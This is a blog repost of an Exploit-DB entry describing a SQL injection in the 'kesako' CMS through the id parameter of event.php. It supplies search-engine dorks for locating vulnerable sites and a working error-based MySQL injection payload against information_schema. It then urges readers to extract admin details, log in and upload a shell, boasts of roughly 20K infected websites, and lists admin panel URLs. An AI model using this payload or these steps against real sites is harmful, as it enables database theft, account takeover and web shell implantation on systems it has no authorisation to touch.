» » [webapps] - kesako script SQL Injection
Edit

[webapps] - kesako script SQL Injection



ad












EDB-ID: 33492 CVE: N/A OSVDB-ID: N/A
Author: Microsoft-dz Published: 2014-05-24 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A 


kesako script SQL Injection
  ===================================================================
  ####################################################################
  #.:. Exploit Title : kesako Script Sql Injection #
  # .:. Author : Microsoft-dz #
  #.:. Contact : [ifyoucanbebeme@gmail.com] #
  #.:. Dork : intext:powered by [kesako] inurl:/event.php?id= #
  #.:. Dork 2 : intext:powered by [kesako] # 
  #.:. Tested on : win&linux #
  #.:. Vendor's Website : http://www.kesako.ch/cms/ #
  #.:. Date : [2014/5/19] #
  ####################################################################
  VULNERABILITY
  ##############
  [~] VULNERABILITY}~~
  [~] www.site.com/modules/event.php?id=[SQL INJECTION]
  [~] www.site.com/modules/event.php?id=[SQL INJECTION]
  #########
  P0C
  #########
  Type: String Mysql Injection
  http://SITE/modules/event.php?id=[SQL INJECTION]
  
  http://site/modules/event.php?id=202 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
  ####################################################################
  1- Get Admin Infos 
  2- then login and upload your shell 
  Enjoy
  About #20K Infected Websites :v
  
  You Can Find The Admin Panel @ http://site/cms/admin
  or http://site/cms/user/
  or http://site/cms/login/
  #########################################################################
  Tnx: R3Z0Uk4




LikeTweet

0 Response to "[webapps] - kesako script SQL Injection"

Post a Comment

Subscribe to: Post Comments (Atom)